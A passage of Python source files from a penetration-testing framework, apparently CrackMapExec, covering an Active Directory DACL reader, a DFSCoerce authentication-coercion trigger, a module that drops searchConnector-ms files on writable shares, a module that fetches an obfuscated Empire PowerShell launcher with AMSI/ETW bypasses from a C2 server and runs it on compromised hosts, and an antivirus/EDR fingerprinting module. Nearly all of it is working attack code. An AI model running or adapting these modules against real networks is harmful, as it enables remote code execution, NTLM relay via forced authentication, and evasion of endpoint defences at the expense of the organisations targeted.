self.target_principal_dn = self.target_principal[0]
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0])
except Exception as e:
context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
exit(1)
if self.action == "read":
self.read(context)
if self.action == "backup":
self.backup(context)
# If there are multiple targets
else:
targets = self.target_file.readlines()
for target in targets:
try:
self.target_sAMAccountName = target.strip()
# Searching for target account with its security descriptor
self.search_target_principal_security_descriptor(context, connection)
# Extract security descriptor data
self.target_principal_dn = self.target_principal[0]
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName)
except Exception as e:
context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
continue
if self.action == "read":
self.read(context)
if self.action == "backup":
self.backup(context)
# Main read funtion
# Prints the parsed DACL
def read(self, context):
parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor["Dacl"])
self.print_parsed_dacl(context, parsed_dacl)
return
# Permits to export the DACL of the targets
# This function is called before any writing action (write, remove or restore)
def backup(self, context):
backup = {}
backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode("latin-1")
backup["dn"] = str(self.target_principal_dn)
if not self.filename:
self.filename = "dacledit-%s-%s.bak" % (
datetime.datetime.now().strftime("%Y%m%d-%H%M%S"),
self.target_sAMAccountName,
)
with codecs.open(self.filename, "w", "latin-1") as outfile:
json.dump(backup, outfile)
context.log.highlight("DACL backed up to %s", self.filename)
self.filename = None
# Attempts to retrieve the DACL in the Security Descriptor of the specified target
def search_target_principal_security_descriptor(self, context, connection):
_lookedup_principal = ""
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
if self.target_sAMAccountName is not None:
_lookedup_principal = self.target_sAMAccountName
target = self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal),
attributes=["nTSecurityDescriptor"],
searchControls=controls,
)
if self.target_DN is not None:
_lookedup_principal = self.target_DN
target = self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(distinguishedName=%s)" % _lookedup_principal,
attributes=["nTSecurityDescriptor"],
searchControls=controls,
)
try:
self.target_principal = target[0]
except Exception as e:
context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." % _lookedup_principal)
exit(0)
# Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName
# Not used for the moment
# - samname : a sAMAccountName
def get_user_info(self, context, samname):
self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(sAMAccountName=%s)" % escape_filter_chars(samname),
attributes=["objectSid"],
)
try:
dn = self.ldap_session.entries[0].entry_dn
sid = format_sid(self.ldap_session.entries[0]["objectSid"].raw_values[0])
return dn, sid
except Exception as e:
context.log.fail("User not found in LDAP: %s" % samname)
return False
# Attempts to resolve a SID and return the corresponding samaccountname
# - sid : the SID to resolve
def resolveSID(self, context, sid):
# Tries to resolve the SID from the well known SIDs
if sid in WELL_KNOWN_SIDS.keys():
return WELL_KNOWN_SIDS[sid]
# Tries to resolve the SID from the LDAP domain dump
else:
try:
dn = self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(objectSid=%s)" % sid,
attributes=["sAMAccountName"],
)[
0
][0]
samname = self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(objectSid=%s)" % sid,
attributes=["sAMAccountName"],
)[0][
1
][0][
1
][0]
return samname
except Exception as e:
context.log.debug("SID not found in LDAP: %s" % sid)
return ""
# Parses a full DACL
# - dacl : the DACL to parse, submitted in a Security Desciptor format
def parse_dacl(self, context, dacl):
parsed_dacl = []
context.log.debug("Parsing DACL")
i = 0
for ace in dacl["Data"]:
parsed_ace = self.parse_ace(context, ace)
parsed_dacl.append(parsed_ace)
i += 1
return parsed_dacl
# Parses an access mask to extract the different values from a simple permission
# https://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
# - fsr : the access mask to parse
def parse_perms(self, fsr):
_perms = []
for PERM in SIMPLE_PERMISSIONS:
if (fsr & PERM.value) == PERM.value:
_perms.append(PERM.name)
fsr = fsr & (not PERM.value)
for PERM in ACCESS_MASK:
if fsr & PERM.value:
_perms.append(PERM.name)
return _perms
# Parses a specified ACE and extract the different values (Flags, Access Mask, Trustee, ObjectType, InheritedObjectType)
# - ace : the ACE to parse
def parse_ace(self, context, ace):
# For the moment, only the Allowed and Denied Access ACE are supported
if ace["TypeName"] in [
"ACCESS_ALLOWED_ACE",
"ACCESS_ALLOWED_OBJECT_ACE",
"ACCESS_DENIED_ACE",
"ACCESS_DENIED_OBJECT_ACE",
]:
parsed_ace = {}
parsed_ace["ACE Type"] = ace["TypeName"]
# Retrieves ACE's flags
_ace_flags = []
for FLAG in ACE_FLAGS:
if ace.hasFlag(FLAG.value):
_ace_flags.append(FLAG.name)
parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None"
# For standard ACE
# Extracts the access mask (by parsing the simple permissions) and the principal's SID
if ace["TypeName"] in ["ACCESS_ALLOWED_ACE", "ACCESS_DENIED_ACE"]:
parsed_ace["Access mask"] = "%s (0x%x)" % (
", ".join(self.parse_perms(ace["Ace"]["Mask"]["Mask"])),
ace["Ace"]["Mask"]["Mask"],
)
parsed_ace["Trustee (SID)"] = "%s (%s)" % (
self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
ace["Ace"]["Sid"].formatCanonical(),
)
# For object-specific ACE
elif ace["TypeName"] in [
"ACCESS_ALLOWED_OBJECT_ACE",
"ACCESS_DENIED_OBJECT_ACE",
]:
# Extracts the mask values. These values will indicate the ObjectType purpose
_access_mask_flags = []
for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS:
if ace["Ace"]["Mask"].hasPriv(FLAG.value):
_access_mask_flags.append(FLAG.name)
parsed_ace["Access mask"] = ", ".join(_access_mask_flags)
# Extracts the ACE flag values and the trusted SID
_object_flags = []
for FLAG in OBJECT_ACE_FLAGS:
if ace["Ace"].hasFlag(FLAG.value):
_object_flags.append(FLAG.name)
parsed_ace["Flags"] = ", ".join(_object_flags) or "None"
# Extracts the ObjectType GUID values
if ace["Ace"]["ObjectTypeLen"] != 0:
obj_type = bin_to_string(ace["Ace"]["ObjectType"]).lower()
try:
parsed_ace["Object type (GUID)"] = "%s (%s)" % (
OBJECT_TYPES_GUID[obj_type],
obj_type,
)
except KeyError:
parsed_ace["Object type (GUID)"] = "UNKNOWN (%s)" % obj_type
# Extracts the InheritedObjectType GUID values
if ace["Ace"]["InheritedObjectTypeLen"] != 0:
inh_obj_type = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
try:
parsed_ace["Inherited type (GUID)"] = "%s (%s)" % (
OBJECT_TYPES_GUID[inh_obj_type],
inh_obj_type,
)
except KeyError:
parsed_ace["Inherited type (GUID)"] = "UNKNOWN (%s)" % inh_obj_type
# Extract the Trustee SID (the object that has the right over the DACL bearer)
parsed_ace["Trustee (SID)"] = "%s (%s)" % (
self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
ace["Ace"]["Sid"].formatCanonical(),
)
else:
# If the ACE is not an access allowed
context.log.debug("ACE Type (%s) unsupported for parsing yet, feel free to contribute" % ace["TypeName"])
parsed_ace = {}
parsed_ace["ACE type"] = ace["TypeName"]
_ace_flags = []
for FLAG in ACE_FLAGS:
if ace.hasFlag(FLAG.value):
_ace_flags.append(FLAG.name)
parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None"
parsed_ace["DEBUG"] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute"
return parsed_ace
# Prints a full DACL by printing each parsed ACE
# - parsed_dacl : a parsed DACL from parse_dacl()
def print_parsed_dacl(self, context, parsed_dacl):
context.log.debug("Printing parsed DACL")
i = 0
# If a specific right or a specific GUID has been specified, only the ACE with this right will be printed
# If an ACE type has been specified, only the ACE with this type will be specified
# If a principal has been specified, only the ACE where he is the trustee will be printed
for parsed_ace in parsed_dacl:
print_ace = True
# Filter on specific rights
if self.rights is not None:
try:
if (self.rights == "FullControl") and (self.rights not in parsed_ace["Access mask"]):
print_ace = False
if (self.rights == "DCSync") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.DS_Replication_Get_Changes_All.value not in parsed_ace["Object type (GUID)"])):
print_ace = False
if (self.rights == "WriteMembers") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.WriteMembers.value not in parsed_ace["Object type (GUID)"])):
print_ace = False
if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])):
print_ace = False
except Exception as e:
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
# Filter on specific right GUID
if self.rights_guid is not None:
try:
if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]):
print_ace = False
except Exception as e:
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
# Filter on ACE type
if self.ace_type == "allowed":
try:
if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]):
print_ace = False
except Exception as e:
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
else:
try:
if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]):
print_ace = False
except Exception as e:
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
# Filter on trusted principal
if self.principal_sid is not None:
try:
if self.principal_sid not in parsed_ace["Trustee (SID)"]:
print_ace = False
except Exception as e:
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
if print_ace:
self.context.log.highlight("%-28s" % "ACE[%d] info" % i)
self.print_parsed_ace(parsed_ace)
i += 1
# Prints properly a parsed ACE
# - parsed_ace : a parsed ACE from parse_ace()
def print_parsed_ace(self, parsed_ace):
elements_name = list(parsed_ace.keys())
for attribute in elements_name:
self.context.log.highlight(" %-26s: %s" % (attribute, parsed_ace[attribute]))
# Retrieves the GUIDs for the specified rights
def build_guids_for_rights(self):
_rights_guids = []
if self.rights_guid is not None:
_rights_guids = [self.rights_guid]
elif self.rights == "WriteMembers":
_rights_guids = [RIGHTS_GUID.WriteMembers.value]
elif self.rights == "ResetPassword":
_rights_guids = [RIGHTS_GUID.ResetPassword.value]
elif self.rights == "DCSync":
_rights_guids = [
RIGHTS_GUID.DS_Replication_Get_Changes.value,
RIGHTS_GUID.DS_Replication_Get_Changes_All.value,
]
self.context.log.highlight("Built GUID: %s", _rights_guids)
return _rights_guids
================================================
FILE: cme/modules/dfscoerce.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
from cme.logger import cme_logger
class CMEModule:
name = "dfscoerce"
description = "Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.listener = None
def options(self, context, module_options):
"""
LISTENER Listener Address (defaults to 127.0.0.1)
"""
self.listener = "127.0.0.1"
if "LISTENER" in module_options:
self.listener = module_options["LISTENER"]
def on_login(self, context, connection):
trigger = TriggerAuth()
dce = trigger.connect(
username=connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain,
doKerberos=connection.kerberos,
dcHost=connection.kdcHost,
aesKey=connection.aesKey,
)
if dce is not None:
context.log.debug("Target is vulnerable to DFSCoerce")
trigger.NetrDfsRemoveStdRoot(dce, self.listener)
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/Wh04m1001/DFSCoerce")
dce.disconnect()
else:
context.log.debug("Target is not vulnerable to DFSCoerce")
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__(self):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return "DFSNM SessionError: code: 0x%x - %s - %s" % (
self.error_code,
error_msg_short,
error_msg_verbose,
)
else:
return "DFSNM SessionError: unknown error code: 0x%x" % self.error_code
################################################################################
# RPC CALLS
################################################################################
class NetrDfsRemoveStdRoot(NDRCALL):
opnum = 13
structure = (
("ServerName", WSTR),
("RootShare", WSTR),
("ApiFlags", DWORD),
)
class NetrDfsRemoveStdRootResponse(NDRCALL):
structure = (("ErrorCode", ULONG),)
class NetrDfsAddRoot(NDRCALL):
opnum = 12
structure = (
("ServerName", WSTR),
("RootShare", WSTR),
("Comment", WSTR),
("ApiFlags", DWORD),
)
class NetrDfsAddRootResponse(NDRCALL):
structure = (("ErrorCode", ULONG),)
class TriggerAuth:
def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):
rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\netdfs]" % target)
if hasattr(rpctransport, "set_credentials"):
rpctransport.set_credentials(
username=username,
password=password,
domain=domain,
lmhash=lmhash,
nthash=nthash,
aesKey=aesKey,
)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
# if target:
# rpctransport.setRemoteHost(target)
rpctransport.setRemoteHost(target)
dce = rpctransport.get_dce_rpc()
cme_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target)
try:
dce.connect()
except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e))
return
try:
dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0")))
except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e))
return
cme_logger.debug("[+] Successfully bound!")
return dce
def NetrDfsRemoveStdRoot(self, dce, listener):
cme_logger.debug("[-] Sending NetrDfsRemoveStdRoot!")
try:
request = NetrDfsRemoveStdRoot()
request["ServerName"] = "%s\x00" % listener
request["RootShare"] = "test\x00"
request["ApiFlags"] = 1
if self.args.verbose:
cme_logger.debug(request.dump())
# logger.debug(request.dump())
resp = dce.request(request)
except Exception as e:
cme_logger.debug(e)
================================================
FILE: cme/modules/drop-sc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import ntpath
class CMEModule:
"""
Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.
https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/
Module by @zblurx
"""
name = "drop-sc"
description = "Drop a searchConnector-ms file on each writable share"
supported_protocols = ["smb"]
opsec_safe = False
multiple_hosts = True
def options(self, context, module_options):
"""
Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.
https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/
Module by @zblurx
URL URL in the searchConnector-ms file, default https://rickroll
CLEANUP Cleanup (choices: True or False)
SHARE Specify a share to target
FILENAME Specify the filename used WITHOUT the extension searchConnector-ms (it's automatically added), default is "Documents"
"""
self.cleanup = False
if "CLEANUP" in module_options:
self.cleanup = bool(module_options["CLEANUP"])
self.url = "https://rickroll"
if "URL" in module_options:
self.url = str(module_options["URL"])
self.sharename = ""
if "SHARE" in module_options:
self.sharename = str(module_options["SHARE"])
self.filename = "Documents"
if "FILENAME" in module_options:
self.filename = str(module_options["FILENAME"])
self.file_path = ntpath.join("\\", f"{self.filename}.searchConnector-ms")
if not self.cleanup:
self.scfile_path = f"/tmp/{self.filename}.searchConnector-ms"
scfile = open(self.scfile_path, "w")
scfile.truncate(0)
scfile.write('')
scfile.write("')
scfile.write("Microsoft Outlook")
scfile.write("false")
scfile.write("true")
scfile.write(f"{self.url}/0001.ico")
scfile.write("")
scfile.write("{91475FE5-586B-4EBA-8D75-D17434B8CDF6}")
scfile.write("")
scfile.write("")
scfile.write("{}".format(self.url))
scfile.write("")
scfile.write("")
scfile.close()
def on_login(self, context, connection):
shares = connection.shares()
for share in shares:
context.log.debug(f"Share: {share}")
if "WRITE" in share["access"] and (share["name"] == self.sharename if self.sharename != "" else share["name"] not in ["C$", "ADMIN$"]):
context.log.success(f"Found writable share: {share['name']}")
if not self.cleanup:
with open(self.scfile_path, "rb") as scfile:
try:
connection.conn.putFile(share["name"], self.file_path, scfile.read)
context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms" f" file on the {share['name']} share")
except Exception as e:
context.log.exception(e)
context.log.fail(f"Error writing {self.filename}.searchConnector-ms file" f" on the {share['name']} share: {e}")
else:
try:
connection.conn.deleteFile(share["name"], self.file_path)
context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the" f" {share['name']} share")
except Exception as e:
context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" f" file on share {share['name']}: {e}")
================================================
FILE: cme/modules/empire_exec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import requests
from requests import ConnectionError
# The following disables the InsecureRequests warning and the 'Starting new HTTPS connection' log message
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class CMEModule:
"""
Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
Module by @byt3bl33d3r
"""
name = "empire_exec"
description = "Uses Empire's RESTful API to generate a launcher for the specified listener and executes it"
supported_protocols = ["smb", "mssql"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
LISTENER Listener name to generate the launcher for
SSL True if the listener is using SSL/TLS
OBFUSCATE True if you want to use the built-in Obfuscation (that calls Invoke-Obfuscate)
OBFUSCATE_CMD Override Invoke-Obfuscation command (Default is "Token,All,1" and is picked up by Defender)
"""
self.empire_launcher = None
if "LISTENER" not in module_options:
context.log.fail("LISTENER option is required!")
sys.exit(1)
api_proto = "https" if "SSL" in module_options else "http"
obfuscate = True if "OBFUSCATE" in module_options else False
# we can use commands instead of backslashes - this is because Linux and OSX treat them differently
default_obfuscation = "Token,All,1"
obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation
context.log.debug(f"Obfuscate: {obfuscate} - Obfuscate_cmd: {obfuscate_cmd}")
# Pull the host and port from the config file
base_url = f"{api_proto}://{context.conf.get('Empire', 'api_host')}:{context.conf.get('Empire', 'api_port')}"
context.log.debug(f"Empire URL: {base_url}")
# Pull the username and password from the config file
empire_creds = {
"username": context.conf.get("Empire", "username"),
"password": context.conf.get("Empire", "password"),
}
context.log.debug(f"Empire Creds: {empire_creds}")
try:
login_response = requests.post(
f"{base_url}/token",
data=empire_creds,
verify=False,
)
except ConnectionError as e:
context.log.fail(f"Unable to login to Empire's RESTful API: {e}")
sys.exit(1)
context.log.debug(f"Response Code: {login_response.status_code}")
context.log.debug(f"Response Content: {login_response.text}")
if login_response.status_code == 200:
access_token = login_response.json()["access_token"]
headers = {"Authorization": f"Bearer {access_token}"}
else:
context.log.fail("Error authenticating to Empire's RESTful API")
sys.exit(1)
data = {
"name": "cme_ephemeral",
"template": "multi_launcher",
"options": {
"Listener": module_options["LISTENER"],
"Language": "powershell",
"StagerRetries": "0",
"OutFile": "",
"Base64": "True",
"Obfuscate": obfuscate,
"ObfuscateCommand": obfuscate_cmd,
"SafeChecks": "True",
"UserAgent": "default",
"Proxy": "default",
"ProxyCreds": "default",
"Bypasses": "mattifestation etw",
},
}
try:
stager_response = requests.post(
f"{base_url}/api/v2/stagers?save=False",
json=data,
headers=headers,
verify=False,
)
except ConnectionError:
context.log.fail(f"Unable to request stager from Empire's RESTful API")
sys.exit(1)
if stager_response.status_code not in [200, 201]:
if "not found" in stager_response.json()["detail"]:
context.log.fail(f"Listener {module_options['LISTENER']} not found")
else:
context.log.fail(f"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}")
sys.exit(1)
context.log.debug(f"Response Code: {stager_response.status_code}")
# context.log.debug(f"Response Content: {stager_response.text}")
stager_create_data = stager_response.json()
context.log.debug(f"Stager data: {stager_create_data}")
download_uri = stager_create_data["downloads"][0]["link"]
download_response = requests.get(
f"{base_url}{download_uri}",
headers=headers,
verify=False,
)
context.log.debug(f"Response Code: {download_response.status_code}")
# context.log.debug(f"Response Content: {download_response.text}")
self.empire_launcher = download_response.text
if download_response.status_code == 200:
context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'")
else:
context.log.fail(f"Something went wrong when retrieving stager Powershell command")
def on_admin_login(self, context, connection):
if self.empire_launcher:
connection.execute(self.empire_launcher)
context.log.success("Executed Empire Launcher")
================================================
FILE: cme/modules/enum_av.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# All credit to @an0n_r0
# project : https://github.com/tothi/serviceDetector
from impacket.dcerpc.v5 import lsat, lsad
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED, RPC_UNICODE_STRING
from impacket.dcerpc.v5 import transport
import pathlib
class CMEModule:
"""
Uses LsarLookupNames and NamedPipes to gather information on all endpoint protection solutions installed on the the remote host(s)
Module by @mpgn_x64
"""
name = "enum_av"
description = "Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
""" """
pass
def on_login(self, context, connection):
success = 0
results = {}
target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
context.log.debug("Detecting installed services on {} using LsarLookupNames()...".format(target))
try:
lsa = LsaLookupNames(
connection.domain,
connection.username,
connection.password,
target,
connection.kerberos,
connection.domain,
connection.lmhash,
connection.nthash,
connection.aesKey,
)
dce, rpctransport = lsa.connect()
policyHandle = lsa.open_policy(dce)
for i, product in enumerate(conf["products"]):
for service in product["services"]:
try:
lsa.LsarLookupNames(dce, policyHandle, service["name"])
context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
if product["name"] not in results:
results[product["name"]] = {"services": []}
results[product["name"]]["services"].append(service)
except Exception as e:
pass
success += 1
except Exception as e:
context.log.fail(str(e))
context.log.info(f"Detecting running processes on {connection.host} by enumerating pipes...")
try:
for f in connection.conn.listPath("IPC$", "\\*"):
fl = f.get_longname()
for i, product in enumerate(conf["products"]):
for pipe in product["pipes"]:
if pathlib.PurePath(fl).match(pipe["name"]):
context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
if product["name"] not in results:
results[product["name"]] = {}
if "pipes" not in results[product["name"]]:
results[product["name"]]["pipes"] = []
results[product["name"]]["pipes"].append(pipe)
success += 1
except Exception as e:
context.log.debug(str(e))
self.dump_results(results, connection.hostname, success, context)
def dump_results(self, results, remoteName, success, context):
# out1 = "On host {} found".format(remoteName)
out1 = ""
for item in results:
out = out1
if "services" in results[item]:
out += f"{item} INSTALLED"
if "pipes" in results[item]:
out += " and it seems to be RUNNING"
# else:
# for product in conf['products']:
# if (item == product['name']) and (len(product['pipes']) == 0):
# out += " (NamedPipe for this service was not provided in config)"
elif "pipes" in results[item]:
out += f" {item} RUNNING"
context.log.highlight(out)
if (len(results) < 1) and (success > 1):
out = out1 + " NOTHING!"
context.log.highlight(out)
class LsaLookupNames:
timeout = None
authn_level = None
protocol = None
transfer_syntax = None
machine_account = False
iface_uuid = lsat.MSRPC_UUID_LSAT
authn = True
def __init__(
self,
domain="",
username="",
password="",
remote_name="",
k=False,
kdcHost="",
lmhash="",
nthash="",
aesKey="",
):
self.domain = domain
self.username = username
self.password = password
self.remoteName = remote_name
self.string_binding = rf"ncacn_np:{remote_name}[\PIPE\lsarpc]"
self.doKerberos = k
self.lmhash = lmhash
self.nthash = nthash
self.aesKey = aesKey
self.dcHost = kdcHost
def connect(self, string_binding=None, iface_uuid=None):
"""Obtains a RPC Transport and a DCE interface according to the bindings and
transfer syntax specified.
:return: tuple of DCE/RPC and RPC Transport objects
:rtype: (DCERPC_v5, DCERPCTransport)
"""
string_binding = string_binding or self.string_binding
if not string_binding:
raise NotImplemented("String binding must be defined")
rpc_transport = transport.DCERPCTransportFactory(string_binding)
# Set timeout if defined
if self.timeout:
rpc_transport.set_connect_timeout(self.timeout)
# Authenticate if specified
if self.authn and hasattr(rpc_transport, "set_credentials"):
# This method exists only for selected protocol sequences.
rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey)
if self.doKerberos:
rpc_transport.set_kerberos(self.doKerberos, kdcHost=self.dcHost)
# Gets the DCE RPC object
dce = rpc_transport.get_dce_rpc()
# Set the authentication level
if self.authn_level:
dce.set_auth_level(self.authn_level)
# Connect
dce.connect()
# Bind if specified
iface_uuid = iface_uuid or self.iface_uuid
if iface_uuid and self.transfer_syntax:
dce.bind(iface_uuid, transfer_syntax=self.transfer_syntax)
elif iface_uuid:
dce.bind(iface_uuid)
return dce, rpc_transport
def open_policy(self, dce):
request = lsad.LsarOpenPolicy2()
request["SystemName"] = NULL
request["ObjectAttributes"]["RootDirectory"] = NULL
request["ObjectAttributes"]["ObjectName"] = NULL
request["ObjectAttributes"]["SecurityDescriptor"] = NULL
request["ObjectAttributes"]["SecurityQualityOfService"] = NULL
request["DesiredAccess"] = MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES
resp = dce.request(request)
return resp["PolicyHandle"]
def LsarLookupNames(self, dce, policyHandle, service):
request = lsat.LsarLookupNames()
request["PolicyHandle"] = policyHandle
request["Count"] = 1
name1 = RPC_UNICODE_STRING()
name1["Data"] = "NT Service\{}".format(service)
request["Names"].append(name1)
request["TranslatedSids"]["Sids"] = NULL
request["LookupLevel"] = lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta
resp = dce.request(request)
return resp
conf = {
"products": [
{
"name": "Bitdefender",
"services": [
{
"name": "bdredline_agent",
"description": "Bitdefender Agent RedLine Service",
},
{"name": "BDAuxSrv", "description": "Bitdefender Auxiliary Service"},
{
"name": "UPDATESRV",
"description": "Bitdefender Desktop Update Service",
},
{"name": "VSSERV", "description": "Bitdefender Virus Shield"},
{"name": "bdredline", "description": "Bitdefender RedLine Service"},
{"name": "EPRedline", "description": "Bitdefender Endpoint Redline Service"},
{"name": "EPUpdateService", "description": "Bitdefender Endpoint Update Service"},
{"name": "EPSecurityService", "description": "Bitdefender Endpoint Security Service"},
{"name": "EPProtectedService", "description": "Bitdefender Endpoint Protected Service"},
{"name": "EPIntegrationService", "description": "Bitdefender Endpoint Integration Service"},
],
"pipes": [
{
"name": "\\bdConnector\\ServiceControl\\EPSecurityService.exe",
"processes": ["EPConsole.exe"],
},
{
"name": "etw_sensor_pipe_ppl",
"processes": ["EPProtectedService.exe"],
},
{
"name": "local\\msgbus\\antitracker.low\\*",
"processes": ["bdagent.exe"],
},
{
"name": "local\\msgbus\\aspam.actions.low\\*",
"processes": ["bdagent.exe"],
},
{
"name": "local\\msgbus\\bd.process.broker.pipe",
"processes": ["bdagent.exe", "bdservicehost.exe", "updatesrv.exe"],
},
{"name": "local\\msgbus\\bdagent*", "processes": ["bdagent.exe"]},
{
"name": "local\\msgbus\\bdauxsrv",
"processes": ["bdagent.exe", "bdntwrk.exe"],
},
],
},
{
"name": "Windows Defender",
"services": [
{
"name": "WinDefend",
"description": "Windows Defender Antivirus Service",
},
{
"name": "Sense",
"description": "Windows Defender Advanced Threat Protection Service",
},
{
"name": "WdNisSvc",
"description": "Windows Defender Antivirus Network Inspection Service",
},
],
"pipes": [],
},
{
"name": "ESET",
"services": [
{"name": "ekm", "description": "ESET"},
{"name": "epfw", "description": "ESET"},
{"name": "epfwlwf", "description": "ESET"},
{"name": "epfwwfp", "description": "ESET"},
{"name": "EraAgentSvc", "description": "ESET"},
],
"pipes": [{"name": "nod_scriptmon_pipe", "processes": [""]}],
},
{
"name": "CrowdStrike",
"services": [
{
"name": "CSFalconService",
"description": "CrowdStrike Falcon Sensor Service",
}
],
"pipes": [
{
"name": "CrowdStrike\\{*",
"processes": ["CSFalconContainer.exe", "CSFalconService.exe"],
}
],
},
{
"name": "SentinelOne",
"services": [
{
"name": "SentinelAgent",
"description": "SentinelOne Endpoint Protection Agent",
},
{
"name": "SentinelStaticEngine",
"description": "Manage static engines for SentinelOne Endpoint Protection",
},
{
"name": "LogProcessorService",
"description": "Manage logs for SentinelOne Endpoint Protection",
},
],
"pipes": [
{"name": "SentinelAgentWorkerCert.*", "processes": [""]},
{"name": "DFIScanner.Etw.*", "processes": ["SentinelStaticEngine.exe"]},
{"name": "DFIScanner.Inline.*", "processes": ["SentinelAgent.exe"]},
],
},
{
"name": "Carbon Black App Control",
"services": [{"name": "Parity", "description": "Carbon Black App Control Agent"}],
"pipes": [],
},
{
"name": "Cybereason",
"services": [
{
"name": "CybereasonActiveProbe",
"description": "Cybereason Active Probe",
},
{"name": "CybereasonCRS", "description": "Cybereason Anti-Ransomware"},
{
